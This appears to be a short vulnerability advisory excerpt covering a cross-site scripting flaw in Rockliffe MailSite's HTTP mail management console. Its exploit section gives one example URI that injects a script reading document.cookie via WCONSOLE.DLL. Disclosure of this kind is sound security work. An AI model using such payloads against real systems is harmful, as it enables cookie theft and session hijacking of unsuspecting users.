• info
• discussion
• exploit
• solution
• references

Rockliffe MailSite HTTP Mail Management Cross-Site Scripting Vulnerability

An exploit is not required.

An example URI has been provided:

http://www.example.com:90/CGI-BIN/WCONSOLE.DLL?%3Cscript%3Ealert(document.cookie)%3C/script%3E